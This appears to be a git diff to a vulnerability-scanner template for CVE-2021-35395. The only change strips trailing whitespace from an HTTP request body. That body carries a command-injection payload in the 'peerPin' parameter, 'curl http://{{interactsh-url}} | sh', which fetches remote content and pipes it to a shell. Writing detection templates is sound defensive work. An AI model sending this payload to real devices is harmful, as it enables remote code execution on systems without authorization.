diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
index ec5e4d936572..33803857f04f 100644
--- a/http/cves/2021/CVE-2021-35395.yaml
+++ b/http/cves/2021/CVE-2021-35395.yaml
@@ -16,7 +16,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
         # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
-        submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= 
+        submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
 
     matchers:
       - type: word